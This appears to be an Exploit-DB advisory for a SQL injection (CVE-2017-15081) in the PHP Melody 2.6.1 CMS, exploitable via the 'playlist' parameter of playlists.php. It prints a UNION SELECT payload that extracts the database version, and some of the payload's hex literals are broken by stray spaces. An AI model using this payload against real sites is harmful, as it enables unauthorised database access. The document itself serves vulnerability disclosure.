PHP Melody 2.6.1 - SQL Injection

EDB-ID: 43062
Author: Venkat Rajgor
Published: 2017-10-28
CVE: CVE-2017-15081
Type: Webapps
Platform: PHP
Vulnerable App: N/A 

 [+] Author : Venkat Rajgor 
 [+] Email : [email protected] 
 [+] Vulnerability : SQL injection 
 ################################################### 
 E-mail ID : [email protected] 
 Download : http://www.phpsugar.com 
 Web : http://www.phpsugar.com 
 Price : $39 USD 
 ################################################### 
 Vulnerable parameter: http://x.x.x.x/playlists.php?playlist= 
 Application : PHPSUGAR PHP Melody version 2.6.1 
 Vulnerability : PHPSUGAR PHP Melody 2.6.1 SQL Injection 
 ################################################### 
  
 Description : In PHPSUGAR PHP Melody CMS 2.6.1, SQL Injection exists via the playlist parameter to playlists.php. 
  
 Payload Used : ' UNION SELECT null,concat(0x223c2f613e3c2f64 69763e3c2f6469763e,version(),0 x3c212d2d),null,null,null,null ,null,null,null,null,null-- -

Source: www.exploit-db.com
Related Posts